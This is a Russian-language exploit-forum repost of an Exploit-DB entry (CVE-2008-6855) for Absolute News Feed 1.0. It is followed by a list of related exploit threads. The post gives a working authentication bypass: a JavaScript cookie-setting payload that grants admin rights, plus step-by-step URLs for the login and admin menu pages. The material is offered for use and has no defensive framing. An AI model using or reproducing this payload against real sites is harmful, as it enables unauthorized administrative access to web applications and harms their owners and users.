Exploit Absolute News Feed 1.0 - Remote Insecure Cookie Handling

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6901
Проверка EDB
  1. Пройдено
Автор
HAKXER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6855
Дата публикации
2008-10-31
Код: 
########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# milw0rm.com [2008-10-31]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Absolute News Manager .NET 5.1 - 'getpath.aspx' Direct Request Error Message Information
Ответы
0
Просмотры
334
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Cross-Site Scripting
Ответы
0
Просмотры
345
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx?rmore' Cross-Site Scripting
Ответы
0
Просмотры
348
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute News Manager .NET 5.1 - 'xlaabsolutenm.aspx' Multiple SQL Injections
Ответы
0
Просмотры
349
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute News Manager .NET 5.1 - '/pages/default.aspx?template' Remote File Access
Ответы
0
Просмотры
329
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute News Manager 5.1 - Insecure Cookie Handling
Ответы
0
Просмотры
301
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service
Ответы
0
Просмотры
372
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection
Ответы
0
Просмотры
372
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting
Ответы
0
Просмотры
317
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
Ответы
0
Просмотры
324
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу